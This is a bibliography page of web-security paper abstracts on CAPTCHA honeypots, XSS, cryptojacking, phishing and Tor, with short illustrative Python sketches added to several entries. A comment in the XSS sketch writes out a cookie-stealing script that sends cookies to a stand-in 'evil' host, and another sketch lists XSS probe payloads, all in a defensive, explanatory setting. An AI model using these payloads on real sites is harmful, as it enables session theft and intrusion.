Biblio

Filters: Keyword is Web sites
Banday, M. T., Sheikh, S. A..  2020.  Improving Security Control of Text-Based CAPTCHA Challenges using Honeypot and Timestamping. 2020 Fourth International Conference on Computing Methodologies and Communication (ICCMC). :704–708.

Resistance to attacks that aim to break CAPTCHA challenges, and usability, that is, the effectiveness, efficiency and satisfaction of the human users who solve them, are the two major concerns when designing CAPTCHA schemes. User-friendliness, universality and accessibility are related dimensions of usability, which must also be addressed adequately. With recent advances in segmentation and optical character recognition techniques, complex distortions, degradations and transformations have been added to text-based CAPTCHA challenges, reducing their usability. The extent of these deformations can be decreased if an additional security mechanism is incorporated into such challenges. This paper proposes an additional security mechanism that can add an extra layer of protection to any text-based CAPTCHA challenge, making it more challenging for the bots and scripts that might be used to attack websites and web applications. It proposes the use of hidden text boxes for user entry of the CAPTCHA string, which serve as honeypots for bots and automated scripts. The honeypot technique tricks bots and automated scripts into filling in input fields that legitimate human users cannot see and therefore leave empty. The paper reports an implementation of the honeypot technique and the results of tests carried out over three months, during which form submissions were logged for analysis. The results demonstrate the effectiveness of the honeypot technique in improving the security control and usability of text-based CAPTCHA challenges.
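The server-side check at the heart of this technique can be sketched as follows (a minimal illustration assuming a Flask endpoint; the framework choice, field names and threshold are our assumptions, not the authors' implementation):

    import time
    from flask import Flask, request, abort

    app = Flask(__name__)

    MIN_FILL_SECONDS = 3  # a human rarely completes the form faster than this

    @app.route("/submit", methods=["POST"])
    def submit():
        # "hp_captcha" is a text box hidden via CSS: humans never see it,
        # so any non-empty value betrays a bot that fills every field.
        if request.form.get("hp_captcha", ""):
            abort(403)
        # Timestamping: reject submissions arriving implausibly fast
        # relative to the server-issued timestamp embedded in the form.
        issued = float(request.form.get("ts", "0"))
        if time.time() - issued < MIN_FILL_SECONDS:
            abort(403)
        return "OK"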

Kerschbaumer, C., Ritter, T., Braun, F..  2020.  Hardening Firefox against Injection Attacks. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW). :653–663.
Web browsers display content in the form of HTML, CSS and JavaScript retrieved from the World Wide Web. The loaded content is subject to the web security model and is considered untrusted and potentially malicious. To complicate security matters, Firefox uses the same technologies to render its user interface as it does to render untrusted web content, which blurs the distinction between the two privilege levels. Getting the interactions between the two correct turns out to be complicated and has led to numerous real-world security vulnerabilities. We study those vulnerabilities to discover common threats and explain how we address them systematically to harden Firefox.
Singh, M., Singh, P., Kumar, P..  2020.  An Analytical Study on Cross-Site Scripting. 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA). :1–6.
Cross-Site Scripting, also known as XSS, is a type of injection in which malicious scripts are injected into trusted websites. An XSS attack is said to have taken place when malicious code, usually in the form of a browser-side script, is delivered through a web application to a different end user. The flaws that allow this attack to succeed are remarkably widespread and occur anywhere a web application handles user input without validating or encoding it. A study carried out by Symantec states that more than 50% of websites are vulnerable to XSS attacks. Security engineers at Microsoft coined the term “Cross-Site Scripting” in January 2000, but even though the term dates from 2000, XSS vulnerabilities had been reported and exploited since the early 1990s, with victims including (then) tech giants such as Twitter, Myspace, Orkut, Facebook and YouTube. Hence the name “Cross-Site” Scripting. This attack can be combined with other attacks, such as phishing, to make it more lethal, but that usually is not necessary: XSS is already extremely difficult to deal with from a user perspective because in many cases it looks entirely legitimate, leveraging attacks against our banks and shopping websites rather than some obviously fake malicious website.
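The flaw and its standard remedy can be illustrated with a hypothetical reflected-XSS handler (a sketch assuming Flask; not taken from the paper):

    from html import escape
    from flask import Flask, request

    app = Flask(__name__)

    @app.route("/search")
    def search():
        q = request.args.get("q", "")
        # Vulnerable: returning f"<p>Results for {q}</p>" would execute
        # q = "<script>document.location='//evil?c='+document.cookie</script>"
        # Safe: HTML-encode untrusted input before reflecting it.
        return f"<p>Results for {escape(q)}</p>"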
Varlioglu, S., Gonen, B., Ozer, M., Bastug, M..  2020.  Is Cryptojacking Dead After Coinhive Shutdown? 2020 3rd International Conference on Information and Computer Technologies (ICICT). :385–389.
Cryptojacking is the exploitation of victims' computer resources to mine cryptocurrency using malicious scripts. It became popular after 2017, when attackers started to exploit legal mining scripts, especially Coinhive scripts. Coinhive was in fact a legal mining service that provided scripts and servers for in-browser mining activities; nevertheless, over 10 million web users were victimized every month before the Coinhive shutdown in March 2019. This paper explores the new era of the cryptojacking world after Coinhive discontinued its service. We aimed to see whether and how attackers continue cryptojacking, generate new malicious scripts, and develop new methods. We used a capable cryptojacking detector named CMTracker, proposed by Hong et al. in 2018. We automatically and manually examined 2770 websites that had been detected by CMTracker before the Coinhive shutdown. The results revealed that 99% of the sites no longer perform cryptojacking, while 1% of the websites still run 8 unique mining scripts. By tracking these mining scripts, we detected 632 unique cryptojacking websites. Moreover, open-source intelligence (OSINT) investigations demonstrated that attackers still use the same methods. We therefore list the typical patterns of cryptojacking and conclude that cryptojacking is not dead after the Coinhive shutdown. It is still alive, but not as attractive as it used to be.
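A simplified version of the script-tracking step might look like the following (an illustrative static scan, not CMTracker itself; the signature list is a small hypothetical sample):

    import re
    import requests

    MINER_PATTERNS = [
        r"coinhive\.min\.js",           # loader of the now-defunct Coinhive
        r"CoinHive\.Anonymous",         # Coinhive API entry point
        r"cryptonight",                 # CPU-bound hash routine used by miners
        r"new\s+Worker\(.{0,80}miner",  # worker-based mining bootstrap
    ]

    def looks_like_cryptojacking(url: str) -> bool:
        html = requests.get(url, timeout=10).text
        return any(re.search(p, html, re.IGNORECASE) for p in MINER_PATTERNS)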
Tizio, G. Di, Ngo, C. Nam.  2020.  Are You a Favorite Target For Cryptojacking? A Case-Control Study On The Cryptojacking Ecosystem. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW). :515–520.
Illicitly hijacking visitors' computational resources to mine cryptocurrency via compromised websites is a consolidated activity. Previous works mainly focused on large-scale analyses of the cryptojacking ecosystem, technical means to detect browser-based mining, and the economic incentives behind cryptojacking. So far, no one has studied whether certain technical characteristics of a website can increase (or decrease) the likelihood of its being compromised for cryptojacking campaigns. In this paper, we address this unanswered question by conducting a case-control study with cryptojacking websites obtained by crawling the web using Minesweeper. Our preliminary analysis shows some association for certain website characteristics; however, the results obtained are not statistically significant. Thus, more data must be collected and further analysis conducted to obtain better insight into these relations.
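The case-control logic amounts to testing whether a characteristic is over-represented among compromised sites; a minimal sketch with invented counts (not the paper's data):

    from scipy.stats import fisher_exact

    #            characteristic present, absent
    cases    = [34, 66]   # cryptojacking sites
    controls = [25, 75]   # matched benign sites

    odds_ratio, p_value = fisher_exact([cases, controls])
    print(f"OR={odds_ratio:.2f}, p={p_value:.3f}")  # p >= 0.05: not significant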
Adil, M., Khan, R., Ghani, M. A. Nawaz Ul.  2020.  Preventive Techniques of Phishing Attacks in Networks. 2020 3rd International Conference on Advancements in Computational Sciences (ICACS). :1–8.

The Internet is the most widely used technology in the current era of information technology and is embedded in daily life activities. Due to its extensive use in everyday life, it has many applications, such as social media (Facebook, WhatsApp, Messenger, etc.) and other online applications such as online businesses, e-counseling, advertisement on websites, e-banking, e-hunting websites, e-doctor appointments and e-doctor opinions. These applications of Internet technology make things easy and accessible for human beings in limited time; however, the technology is vulnerable to various security threats. A vital and severe threat associated with this technology, or with a particular application, is the “phishing attack”, which attackers use to subvert network security. Phishing attacks include fake e-mails, fake websites and fake applications, which are used to steal users' credentials or compromise their security. In this paper, we give a detailed overview of various phishing attacks, specifically their background, and the solutions proposed in the literature to address these issues using techniques such as anti-phishing tools, honeypots and firewalls, as well as the installation of intrusion detection systems (IDS) and intrusion detection and prevention systems (IPS) in networks to allow only authentic traffic in an operational network. In this work, we also conducted an end-user awareness campaign to educate and train employees in order to minimize the occurrence probability of these attacks. The result analysis observed for this survey was quite positive in terms of its effectiveness in addressing the aforementioned issues.

Korolev, D., Frolov, A., Babalova, I..  2020.  Classification of Websites Based on the Content and Features of Sites in Onion Space. 2020 IEEE Conference of Russian Young Researchers in Electrical and Electronic Engineering (EIConRus). :1680–1683.
This paper describes a method for classifying onion sites. Based on the results of the research, a model of the most common kinds of sites in onion space is built. To create such a model, a specially trained neural network is used. The classification is based on five different features: the use of an authentication system, corporate email, a readable URL, feedback, and the type of onion site. Statistics on the most common types of websites on the dark net are given.
Ge, K., He, Y..  2020.  Detection of Sybil Attack on Tor Resource Distribution. 2020 IEEE International Conference on Power, Intelligent Computing and Systems (ICPICS). :328–332.
The Tor anonymous communication system's resource publishing is vulnerable to enumeration attacks. Zhao's method marks users whose requested resources become unavailable as suspicious malicious users, and gradually reduces the scope of suspicious users through several stages to lower the false positive rate. However, it takes several stages to distinguish users, and although the method successfully detects malicious users, they have already acquired many resources in the earlier stages, which reduces the availability of the anonymous communication system. This paper proposes a detection method based on Integer Linear Programming to detect malicious users who perform enumeration attacks on resources during resource distribution. First, we construct a bipartite graph between the unavailable resources and the users who requested those resources in the anonymous communication system; next, we use Integer Linear Programming to find the minimum malicious user set. We simulate the resource distribution process in software and perform an experimental analysis of the proposed method. Experimental results show that its accuracy is above 80% when the unavailable resources in the system account for no more than 50%, about 10% higher than Zhao's method.
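The ILP step is essentially a minimum set cover over the bipartite graph; a small sketch assuming the PuLP solver and an invented request log:

    import pulp

    # Hypothetical bipartite graph: unavailable resource -> requesting users.
    requested_by = {"r1": ["u1", "u2"], "r2": ["u2"], "r3": ["u2", "u3"]}
    users = sorted({u for us in requested_by.values() for u in us})

    prob = pulp.LpProblem("min_malicious_users", pulp.LpMinimize)
    x = {u: pulp.LpVariable(u, cat="Binary") for u in users}
    prob += pulp.lpSum(x.values())                 # as few suspects as possible
    for r, us in requested_by.items():             # every unavailable resource
        prob += pulp.lpSum(x[u] for u in us) >= 1  # must be explained by one
    prob.solve()
    suspects = [u for u in users if x[u].value() == 1]  # here: ["u2"]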
Habibi, G., Surantha, N..  2020.  XSS Attack Detection With Machine Learning and n-Gram Methods. 2020 International Conference on Information Management and Technology (ICIMTech). :516–520.

Cross-Site Scripting (XSS) is an attack most often carried out by inserting malicious scripts into a website. The attack takes the user to a webpage that has been specifically designed to steal user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors evaluate several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). Each machine learning algorithm is then combined with the n-gram method, applied to the script features, to improve XSS attack detection performance. The simulation results show that the combination of SVM and the n-gram method achieves the highest accuracy, at 98%.
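The detection pipeline the paper describes can be approximated in a few lines of scikit-learn (a sketch; the toy samples and the character 1-3-gram setting are our assumptions):

    from sklearn.feature_extraction.text import TfidfVectorizer
    from sklearn.pipeline import make_pipeline
    from sklearn.svm import LinearSVC

    scripts = ["<script>alert(document.cookie)</script>", "<p>hello world</p>"]
    labels  = [1, 0]  # 1 = XSS payload, 0 = benign

    model = make_pipeline(
        TfidfVectorizer(analyzer="char", ngram_range=(1, 3)),  # n-gram features
        LinearSVC(),                                           # SVM classifier
    )
    model.fit(scripts, labels)
    print(model.predict(["<img src=x onerror=alert(1)>"]))     # likely [1]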

Haddad, G. El, Aïmeur, E., Hage, H..  2018.  Understanding Trust, Privacy and Financial Fears in Online Payment. 2018 17th IEEE International Conference On Trust, Security And Privacy In Computing And Communications/ 12th IEEE International Conference On Big Data Science And Engineering (TrustCom/BigDataSE). :28–36.
In online payment, customers must transmit their personal and financial information through the website to conclude their purchase and pay for the selected services or items. They may fear online transactions because of their perceived risk of financial or privacy loss, and they may have concerns over the payment decision that lead to negative behaviors such as shopping cart abandonment. Therefore, three major players need to be addressed in online payment: the online seller, the payment page, and the customer's own perception. However, few studies have explored these three players in an online purchasing environment. In this paper, we focus on customer concerns and examine the antecedents of trust and payment security perception, as well as their joint effect on two fundamentally important customer aspects: privacy concerns and financial fear perception. A total of 392 individuals participated in an online survey. The results highlight the importance of the seller website's components (such as ease of use, security signs, and quality information) and their impact on perceived payment security, as well as their impact on customer trust and financial fear perception. The objective of our study is to design a research model that explains the factors contributing to an online payment decision.
Lavrenovs, A., Melón, F. J. R..  2018.  HTTP security headers analysis of top one million websites. 2018 10th International Conference on Cyber Conflict (CyCon). :345–370.
We present research on the security of the most popular websites, ranked according to Alexa's top one million list, based on an analysis of HTTP response headers. For each of the domains included in the list, we made four different requests: an HTTP/1.1 request to the domain itself and to its "www" subdomain, and two more equivalent HTTPS requests. Redirections were always followed. A detailed discussion of the request process and main outcomes is presented, including X.509 certificate issues and a comparison of the results with equivalent HTTP/2 requests. The body of each response was discarded, and the HTTP response header fields were stored in a database. We analysed the prevalence of the most important response headers related to web security, in particular Strict-Transport-Security, Content-Security-Policy, X-XSS-Protection, X-Frame-Options, Set-Cookie (for session cookies) and X-Content-Type-Options. We also reviewed the contents of response headers that could potentially reveal unwanted information, such as Server (and related headers), Date and Referrer-Policy. This research offers an up-to-date survey of the prevalence of web security policies implemented through HTTP response headers and concludes that the most popular sites tend to implement them noticeably more often than less popular ones. Equally, HTTPS sites seem far more eager to implement those policies than HTTP-only websites. A comparison with previous work shows that web security policies based on HTTP response headers are continuously growing in adoption, but are still far from satisfactorily widespread.
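The per-domain measurement reduces to fetching each site and recording which security headers are present; a minimal sketch using the requests library (header list as in the paper, details of the crawl simplified):

    import requests

    SECURITY_HEADERS = [
        "Strict-Transport-Security", "Content-Security-Policy",
        "X-XSS-Protection", "X-Frame-Options", "X-Content-Type-Options",
    ]

    def audit(domain: str) -> dict:
        # Follow redirects, as in the study; keep headers, discard the body.
        resp = requests.get(f"https://{domain}", timeout=10,
                            allow_redirects=True)
        return {h: resp.headers.get(h) for h in SECURITY_HEADERS}

    print(audit("example.com"))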
Khurana, N., Mittal, S., Piplai, A., Joshi, A..  2019.  Preventing Poisoning Attacks On AI Based Threat Intelligence Systems. 2019 IEEE 29th International Workshop on Machine Learning for Signal Processing (MLSP). :1–6.

As AI systems become more ubiquitous, securing them becomes an emerging challenge. Over the years, with the surge in online social media use and the data available for analysis, AI systems have been built to extract, represent and use this information. The credibility of this information extracted from open sources, however, can often be questionable. Malicious or incorrect information can cause a loss of money, reputation, and resources; and in certain situations, pose a threat to human life. In this paper, we use an ensembled semi-supervised approach to determine the credibility of Reddit posts by estimating their reputation score to ensure the validity of information ingested by AI systems. We demonstrate our approach in the cybersecurity domain, where security analysts utilize these systems to determine possible threats by analyzing the data scattered on social media websites, forums, blogs, etc.

Gaio Rito, Cátia Sofia, Beatriz Piedade, Maria, Eugénio Lucas, Eugénio.  2019.  E-Government - Qualified Digital Signature Case Study. 2019 14th Iberian Conference on Information Systems and Technologies (CISTI). :1–6.

This paper presents a case study on the use and implementation of the Qualified Digital Signature. Issues such as the degree of use, the security and authenticity of the Qualified Digital Signature, and the publication and dissemination of digitally signed documents are analyzed. To support the case study, a methodology was adopted that included interviews with municipalities belonging to the Intermunicipal Community of the region of Leiria, and a computer application was developed to analyze which of the documents available on the municipalities' institutional websites were digitally signed. The results show that institutional websites are already providing documentation with Qualified Digital Signatures and that the level of trust and authenticity regarding their use is considered mostly very positive.

Shayganmehr, Masoud, Montazer, Gholam Ali.  2019.  Identifying Indexes Affecting the Quality of E-Government Websites. 2019 5th International Conference on Web Research (ICWR). :167–171.

With the development of new technologies around the world, governments tend to communicate with citizens and businesses with the help of such technologies. Electronic government (e-government) is defined as the use of information technologies, such as electronic networks, the Internet and mobile phones, by organizations and state institutions in order to establish broad communication between citizens, businesses and different state institutions. The development of e-government starts with building a website to share information with users, which is considered the main infrastructure for further development. Website assessment is a way of improving service quality. Various international studies have introduced indexes for website assessment, but each considers only some dimensions of a website. In this paper, based on an accurate review of previous studies, the most important indexes for website quality assessment are "Web Design", "Navigation", "Services", "Maintenance and Support", "Citizen Participation", "Information Quality", "Privacy and Security", "Responsiveness" and "Usability". Considering these indexes when designing a website facilitates user interaction with e-government websites.

Lv, Chengcheng, Zhang, Long, Zeng, Fanping, Zhang, Jian.  2019.  Adaptive Random Testing for XSS Vulnerability. 2019 26th Asia-Pacific Software Engineering Conference (APSEC). :63–69.
XSS is one of the most common vulnerabilities in web applications. Many black-box testing tools collect a large number of payloads and traverse them to find one that can be successfully injected, but they are not very efficient, and previous research has paid little attention to improving the efficiency of black-box testing for XSS vulnerability detection. To improve testing efficiency, we develop an XSS testing tool that collects 6128 payloads and uses a headless browser to detect XSS vulnerabilities. The tool can discover XSS vulnerabilities quickly using the ART (Adaptive Random Testing) method. We conduct an experiment using 3 widely adopted open-source vulnerable benchmarks and 2 real websites to evaluate the ART method. The experimental results indicate that the ART method reduces the number of attempts needed before a successful injection by more than 27.1% compared to plain fuzzing.
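The essence of ART is to pick each next payload far away from those already tried, so that attempts spread across the payload space; a sketch under the assumption of a simple character-set Jaccard distance (the tool's actual metric is not stated here):

    import random

    def distance(a: str, b: str) -> float:
        sa, sb = set(a), set(b)
        return 1 - len(sa & sb) / len(sa | sb)

    def next_payload(pool, tried, k=10):
        if not tried:
            return random.choice(pool)
        candidates = random.sample(pool, min(k, len(pool)))
        # Fixed-size candidate set: keep the one farthest from all past tries.
        return max(candidates, key=lambda c: min(distance(c, t) for t in tried))

    pool = ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>",
            "javascript:alert(1)", "'\"><svg onload=alert(1)>"]
    tried = []
    while pool:
        p = next_payload(pool, tried)
        tried.append(p); pool.remove(p)  # inject p, then check for execution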
Mohammadi, Mahmoud, Chu, Bill, Richter Lipford, Heather.  2019.  Automated Repair of Cross-Site Scripting Vulnerabilities through Unit Testing. 2019 IEEE International Symposium on Software Reliability Engineering Workshops (ISSREW). :370–377.
Many web applications are vulnerable to Cross-Site Scripting (XSS) attacks, enabling attackers to steal sensitive information and commit fraud. Much research in this area has focused on detecting vulnerable web pages using static and dynamic program analysis. The best practice for preventing XSS vulnerabilities is to encode untrusted dynamic content; however, a common programming error is the use of the wrong type of encoder to sanitize untrusted data, leaving the application vulnerable. We propose a new approach that can automatically fix this common type of XSS vulnerability in many situations. The approach is integrated into the software maintenance life cycle through unit testing. Vulnerable code is refactored to use the suggested encoder and then verified using an attack evaluation mechanism to find a proper repair. The approach has been evaluated on an open-source medical record application with over 200 web pages written in JSP.
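The core repair idea, choosing an encoder that matches the sink's output context, can be sketched as follows (the context names and the mapping are illustrative assumptions, not the authors' exact implementation):

    import html, json
    from urllib.parse import quote

    ENCODERS = {
        "html_body": lambda v: html.escape(v, quote=False),  # <p>VALUE</p>
        "html_attr": html.escape,                            # attr="VALUE"
        "url_param": quote,                                  # href="/x?q=VALUE"
        "js_string": json.dumps,                             # var s = VALUE;
    }

    def repair(value: str, context: str) -> str:
        # A unit test would inject attack strings, identify the sink's
        # context, and verify the suggested encoder neutralizes the payload.
        return ENCODERS[context](value)

    print(repair("<script>alert(1)</script>", "html_body"))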
Shekhar, Heemany, Moh, Melody, Moh, Teng-Sheng.  2019.  Exploring Adversaries to Defend Audio CAPTCHA. 2019 18th IEEE International Conference On Machine Learning And Applications (ICMLA). :1155–1161.
CAPTCHA is a web-based authentication method used by websites to distinguish between humans (valid users) and bots (attackers). Audio captcha is an accessible captcha meant for visually impaired users, such as color-blind, blind and near-sighted users. Firstly, this paper analyzes how secure current audio captchas are against attacks using machine learning (ML) and deep learning (DL) models. Each audio captcha is made up of five, seven or ten random digits [0-9] spoken one after the other, with varying background noise throughout the length of the audio. If the ML or DL model correctly identifies all the spoken digits, in the correct order of occurrence, in a single audio captcha, we consider that captcha broken and the attack successful. Throughout the paper, accuracy refers to the attack model's success at breaking audio captchas: the higher the attack accuracy, the less secure the audio captchas are. In our baseline experiments, we found that attack models could break audio captchas that had no or medium background noise, with any number of spoken digits, with nearly 99% to 100% accuracy, whereas audio captchas with high background noise were relatively more secure, with an attack accuracy of 85%. Secondly, we propose that adversarial example algorithms can be used to create a new kind of audio captcha that is more resilient to attacks. We found that even after retraining the models on the new adversarial audio data, the attack accuracy remained as low as 25% to 36%. Lastly, we explore the benefits of creating adversarial audio captchas with different algorithms, such as the Basic Iterative Method (BIM) and DeepFool. We found that as long as the attacker has less than 45% of the samples from each kind of adversarial audio dataset, the defense succeeds in preventing attacks.
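For reference, the Basic Iterative Method perturbs a waveform step by step along the sign of the loss gradient while staying within an epsilon-ball; a sketch in which grad_of_loss stands in for the attack model's gradient (an assumed callable, not part of the paper's code):

    import numpy as np

    def bim(audio: np.ndarray, grad_of_loss, eps=0.01, alpha=0.002, steps=10):
        x = audio.copy()
        for _ in range(steps):
            x = x + alpha * np.sign(grad_of_loss(x))  # ascend the model's loss
            x = np.clip(x, audio - eps, audio + eps)  # keep changes inaudible
        return x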
Moe, Khin Su Myat, Win, Thanda.  2018.  Enhanced Honey Encryption Algorithm for Increasing Message Space against Brute Force Attack. 2018 15th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). :86–89.
In the era of digitization, data security plays a vital role in message transmission, and all systems that deal with users require strong encryption techniques that resist brute force attacks. The honey encryption (HE) algorithm is a user data protection algorithm that can deceive attackers attempting unauthorized access to users, databases and websites. The main component of conventional HE is the distribution transforming encoder (DTE). However, the current DTE process, which uses a cumulative distribution function (CDF), suffers from message space limitation, because the CDF approach cannot handle the probability computation for more than four messages. We therefore propose a new DTE process using a discrete distribution function in order to solve the message space limitation problem. Our proposed honeywords generation method also resolves weaknesses of existing honeywords generation methods, such as the storage overhead problem. In this paper, we further present case study calculations of the DTE in order to show that the new DTE process has no message space limitation and that the mathematical model using a discrete distribution function for the DTE process fits the underlying probability distribution.
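A discrete-distribution DTE can be pictured as giving each message a share of the seed space proportional to its probability, so that decoding a random seed yields a plausible decoy; a toy sketch with invented messages and probabilities:

    import secrets

    SEED_SPACE = 2**16
    TABLE = [("msg_a", 0.5), ("msg_b", 0.25), ("msg_c", 0.125), ("msg_d", 0.125)]

    ranges, start = {}, 0
    for msg, p in TABLE:                 # cumulative seed range per message
        end = start + int(p * SEED_SPACE)
        ranges[msg] = (start, end)
        start = end

    def encode(msg: str) -> int:
        lo, hi = ranges[msg]
        return lo + secrets.randbelow(hi - lo)  # uniform seed in the range

    def decode(seed: int) -> str:
        for msg, (lo, hi) in ranges.items():
            if lo <= seed < hi:
                return msg

    assert decode(encode("msg_b")) == "msg_b"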
Agrawal, Shriyansh, Sanagavarapu, Lalit Mohan, Reddy, YR.  2019.  FACT - Fine grained Assessment of web page CredibiliTy. TENCON 2019 - 2019 IEEE Region 10 Conference (TENCON). :1088–1097.
With more than a trillion web pages, there is a plethora of content available for consumption. Search engine queries invariably lead to overwhelming information, parts of it relevant and some of it irrelevant. Often the information provided can be conflicting, ambiguous and inconsistent, contributing to a loss of credibility of the content. In the past, researchers have proposed approaches for credibility assessment and enumerated factors influencing the credibility of web pages. In this work, we detail the WEBCred framework for automated genre-aware credibility assessment of web pages. We developed a tool based on the proposed framework to extract instances of web page features and identify the genre a web page belongs to while assessing its Genre Credibility Score (GCS). We validated our approach on an 'Information Security' dataset of 8,550 URLs with 171 features across 7 genres. The supervised learning algorithm Gradient Boosted Decision Trees classified genres with 88.75% testing accuracy over 10-fold cross-validation, an improvement over the current benchmark. We also examined our approach on 'Health' domain web pages, with comparable results. The calculated GCS correlated 69% with the crowdsourced Web of Trust (WOT) score and 13% with the algorithm-based Alexa ranking across 5 information security groups. This variance in correlation suggests that our GCS approach aligns with the human way (WOT) rather than the algorithmic way (Alexa) of web assessment in both experiments.
Yulianto, Arief Dwi, Sukarno, Parman, Warrdana, Aulia Arif, Makky, Muhammad Al.  2019.  Mitigation of Cryptojacking Attacks Using Taint Analysis. 2019 4th International Conference on Information Technology, Information Systems and Electrical Engineering (ICITISEE). :234–238.

Cryptojacking (also called malicious cryptocurrency mining or cryptomining) is a new threat model that covertly uses CPU resources to “mine” a cryptocurrency in the browser. The impact is a surge in CPU usage and degraded system performance. In this research, an in-browser cryptojacking mitigation has been built as an extension to Google Chrome using the taint analysis method. The method used in this research is attack modeling with an abuse case, using a Man-In-The-Middle (MITM) attack to test the mitigation. The proposed model is designed so that users are notified if a cryptojacking attack occurs and can check the characteristics of the scripts that run in the website background. The results of this research show that taint analysis is a promising method for mitigating cryptojacking attacks: from 100 randomly sampled websites, the taint analysis method detected 19 websites infected with cryptojacking.
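The taint idea, in miniature: values from an untrusted source are marked, the mark survives transformations, and its arrival at a suspicious sink raises an alert. Real tooling instruments the JavaScript engine; this Python sketch only mirrors the concept:

    class Tainted(str):
        pass

    def from_network(payload: str) -> str:
        return Tainted(payload)             # taint source: remote script

    def transform(s: str) -> str:
        out = s.replace("\n", "")
        return Tainted(out) if isinstance(s, Tainted) else out  # propagate

    def cpu_intensive_sink(s: str) -> None:
        if isinstance(s, Tainted):          # tainted data reaches mining sink
            print("ALERT: possible cryptojacking script")

    cpu_intensive_sink(transform(from_network("miner.start()")))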

Tahir, Rashid, Durrani, Sultan, Ahmed, Faizan, Saeed, Hammas, Zaffar, Fareed, Ilyas, Saqib.  2019.  The Browsers Strike Back: Countering Cryptojacking and Parasitic Miners on the Web. IEEE INFOCOM 2019 - IEEE Conference on Computer Communications. :703–711.

With the recent boom in the cryptocurrency market, hackers have been on the lookout for novel ways of commandeering users' machines for covert and stealthy mining operations. In an attempt to expose such under-the-hood practices, this paper explores the issue of browser cryptojacking, whereby miners are secretly deployed inside browser code without the knowledge of the user. To this end, we analyze the top 50k websites from Alexa and find a noticeable percentage of sites indulging in this exploitative exercise, often using heavily obfuscated code. Furthermore, mining prevention plug-ins, such as NoMiner, fail to flag such cleverly concealed instances. Hence, we propose a machine learning solution based on hardware-assisted profiling of browser code in real time. A fine-grained micro-architectural footprint allows us to classify mining applications with >99% accuracy and even flag them if the mining code has been heavily obfuscated or encrypted. We build our own browser extension and show that it outperforms other plug-ins. The proposed design has negligible overhead on the user's machine and works for all standard off-the-shelf CPUs.

Saad, Muhammad, Khormali, Aminollah, Mohaisen, Aziz.  2019.  Dine and Dash: Static, Dynamic, and Economic Analysis of In-Browser Cryptojacking. 2019 APWG Symposium on Electronic Crime Research (eCrime). :1–12.

Cryptojacking is the permissionless use of a target device to covertly mine cryptocurrencies. With cryptojacking, attackers use malicious JavaScript code to force web browsers into solving proof-of-work puzzles, thus making money by exploiting the resources of website visitors. To understand and counter such attacks, we systematically analyze the static, dynamic, and economic aspects of in-browser cryptojacking. For static analysis, we perform content-, currency-, and code-based categorization of cryptojacking samples to 1) measure their distribution across websites, 2) highlight their platform affinities, and 3) study their code complexity. We apply unsupervised learning to distinguish cryptojacking scripts from benign and other malicious JavaScript samples with 96.4% accuracy. For dynamic analysis, we analyze the effect of cryptojacking on critical system resources, such as CPU and battery usage. Additionally, we perform web browser fingerprinting to analyze the information exchange between the victim node and the dropzone cryptojacking server. We also build an analytical model to empirically evaluate the feasibility of cryptojacking as an alternative to online advertisement. Our results show a large negative profit and loss gap, indicating that the model is economically impractical. Finally, by leveraging insights from our analyses, we build countermeasures for in-browser cryptojacking that improve upon the existing remedies.
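The unsupervised step can be pictured as clustering scripts by code features and flagging the miner-like cluster; a toy sketch whose feature choices and values are invented:

    import numpy as np
    from sklearn.cluster import KMeans

    # features: [branching complexity, uses wasm/worker, max loop depth]
    X = np.array([[40, 1, 6], [38, 1, 5], [3, 0, 1], [5, 0, 2]], dtype=float)
    labels = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(X)
    print(labels)  # miner-like scripts fall into their own cluster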

Godawatte, Kithmini, Raza, Mansoor, Murtaza, Mohsin, Saeed, Ather.  2019.  Dark Web Along With The Dark Web Marketing And Surveillance. 2019 20th International Conference on Parallel and Distributed Computing, Applications and Technologies (PDCAT). :483–485.

Cybercriminals widely use the dark web and its illegal functionalities, contributing to crises worldwide. More than half of criminal and terror activities are conducted through the dark web, including cryptocurrency abuse, the sale of human organs, red rooms, child pornography, arms deals, drug deals, the hiring of assassins and hackers, and the distribution of hacking software and malware programs. Law enforcement agencies such as the FBI, NSA, Interpol, Mossad and FSB continually conduct surveillance programs through the dark web to trace down criminals and terrorists and stop their crimes and terror activities. This paper is about dark web marketing and surveillance programs. The research discusses how to access the dark web securely and how law enforcement agencies track down users exhibiting terror behaviours and activities. Moreover, the paper discusses dark web sites through which users can access jihadist services and anonymous markets, including the relevant safety precautions.

Attarian, Reyhane, Hashemi, Sattar.  2019.  Investigating the Streaming Algorithms Usage in Website Fingerprinting Attack Against Tor Privacy Enhancing Technology. 2019 16th International ISC (Iranian Society of Cryptology) Conference on Information Security and Cryptology (ISCISC). :33–38.
The website fingerprinting attack is a traffic analysis attack that aims to identify the URLs of websites visited through the Tor browser. Previous website fingerprinting attacks were based on batch learning methods, which assume that the traffic traces of each website are independent and generated from a stationary probability distribution. In realistic scenarios, however, websites can change over time (dynamic websites), a phenomenon known as concept drift. To deal with data whose distribution changes over time, the classifier must update its model continually and adapt to concept drift. Streaming algorithms are dynamic models with these properties, which leads us to compare various representative data stream classification algorithms for website fingerprinting. Our experiments and results show that using streaming algorithms together with statistical flow-based network traffic features increases accuracy significantly.
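The prequential (test-then-train) loop typical of stream classifiers can be sketched with scikit-learn's partial_fit as a stand-in for the streaming algorithms compared in the paper (the features, labels and batching are illustrative):

    import numpy as np
    from sklearn.linear_model import SGDClassifier

    clf = SGDClassifier()
    classes = np.array([0, 1])        # e.g., two monitored websites

    def prequential(traffic_batches):
        # Each batch is (X, y): new traffic traces and their site labels.
        for X, y in traffic_batches:
            if hasattr(clf, "coef_"):               # evaluate before training
                print("accuracy:", clf.score(X, y))
            clf.partial_fit(X, y, classes=classes)  # adapt to concept drift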
Balouchestani, Arian, Mahdavi, Mojtaba, Hallaj, Yeganeh, Javdani, Delaram.  2019.  SANUB: A new method for Sharing and Analyzing News Using Blockchain. 2019 16th International ISC (Iranian Society of Cryptology) Conference on Information Security and Cryptology (ISCISC). :139–143.
